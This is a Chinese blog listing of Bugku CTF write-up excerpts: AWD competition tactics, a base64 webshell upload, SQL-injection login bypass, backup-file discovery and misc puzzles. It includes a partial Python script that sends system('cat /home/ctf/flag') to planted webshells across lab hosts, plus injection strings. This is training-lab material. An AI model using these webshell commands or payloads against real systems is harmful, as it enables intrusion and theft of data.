Bug ku
~ Venus
这个作者很懒,什么都没留下…
展开
-
CTF——AWD模式小总结
本文以bugku平台awd比赛来写awd 比赛平台一、防御(比赛开始有30分钟防御时间)比赛开始得到一个 靶机,如下信息ssh 用户名和密码,还有虚拟ip然后我们ssh 连接进行防御,这里我推荐使用Xshell配合Xftp使用,打开xshell 新建一个连接,写入相应信息填入用户名还有密码,然后点击连接2. 进入之后我们直接点击,xftp按钮(目的: 需要连接xftp下载文件)连接成功后如下进入/var/www将html文件下载下来 (目的是扫描是否存在后门,还有代码审计原创 2021-11-04 22:51:15 · 16679 阅读 · 18 评论 -
bugku-web-xxx二手交易市场
打开题目先注册账号登录头像那里文件上传抓包我们先上传一个普通的图片,抓包可以看见返回了目录然后上传一只base64 加密的马我们把base64, 后面替换成 php 的一句话木马base64 加密这边发现个小细节,一句话木马;后面 不能有空格,否则马会报错,应该是最后面要是 = 号(我也不太懂)上传马浏览器访问木马蚁剑连接小结:一句话木马;有空格base64 加密后最后一位就是+ 号,这样的马连接不上,这里挺有意思的学到了学到了...原创 2021-10-08 23:27:18 · 2378 阅读 · 0 评论 -
awd-python批量拿flag,批量提交
代码仅供参考import requestsimport redata = { '123':"system('cat+/home/ctf/flag');" # 一句话木马}list = []def shell(): for i in range(1,255): try: io = requests.get("http://192-168-1-" + str(i) + ".awd.bugku.cn/e/search/result/原创 2021-06-26 21:37:32 · 5707 阅读 · 1 评论 -
bugku-web-login2
题目地址提示:命令执行打开是一个登入框,猜测是SQL注入。登入一下发现可疑字符base64 解密为$sql="SELECT username,password FROM admin WHERE username='".$username."'";if (!empty($row) && $row['password']===md5($password)){}审计这段小代码,发现可以输入不存在用户,从而登入成功。命令:username=Venus'un原创 2021-06-20 14:05:24 · 917 阅读 · 0 评论 -
bugku-misc-可爱的故事
bugku-misc-可爱的故事下载文件,打开两张图片啥也看不懂,这叫可爱???根据评论提示是原神里面的提瓦特字母,下面来张表3. hint.txt 里面说flag为大兔子说的一句带bugku的话,那就找带bugku的吧。。翻译了好久找到了,其实可以不用像我这样翻译,直接找相应字母就行。。最后结果bugku{iamlearningteyvatinbugku}做了2个小时的样子,做着做着旁边突然多了个人,吓我一跳,原来是我裂开了...原创 2021-04-21 19:55:06 · 1249 阅读 · 6 评论 -
bugku-misc-贝斯手
bugku-misc-贝斯手题目地址1.下载文件,解压出来3个文件,flag.zip 是加密文件,还有一张图片和txt文件。2. 打开图片看着人有点眼熟,但是图片没发现什么,打开txt文件,发现一些信息,仔细一点会发现txt文件可以下拉。下拉后发现信息flag应该是生日的年份。3. 然后去找这个剧名还有还有这个名字4. 我说照片怎么那么熟悉原来是。。。。。。5. 然后去找古力娜扎的生日,百度一些就行。。。(1992)6. 文件解压后,flag.txt ,5+58 应该是加密类型,5应该是md5原创 2021-04-20 19:38:45 · 574 阅读 · 0 评论 -
bugku-MISC-社工-进阶收集
bugku-MISC-社工-进阶收集题目下载下来一张图片首先要知道图片是什么位置,我们把图片截图下来,拿到百度识图搜索一下西安的 大雁塔。。。。。看评论信息,楼主说坐了7站,中途转了1站,我们网上找到西安的地铁图,并且找到去大雁塔只有7站的地点。找了一下只有如下位置,满足始发站,并且是7站,转车1站评论说楼主走路1站去,这样就是6站,但是楼主回复了,下一站(航天域)离她家1公里多,但是始发站(韦曲南)只有离她家差不多800米,这个时候我们就可以找所有离始发站800左右的小区,并且离第二站1公原创 2021-04-17 22:39:38 · 511 阅读 · 1 评论 -
Bugku web16 备份是个好习惯
Bugku web16 备份是个好习惯打开网页是怎么个玩意,看格式好像是md5先不管。因为题目是讲的备份文件,那就用路径扫描工具扫一下扫描出了一个index.php.bak 应该是这个没错了果然是,下载下来后是一个index.php文件,代码如下 // 代码是我加上去的<?phpinclude_once "flag.php"; // include 文件包含 加_once 的意思是不区分大小写ini_set("display_e原创 2020-12-26 10:41:45 · 687 阅读 · 4 评论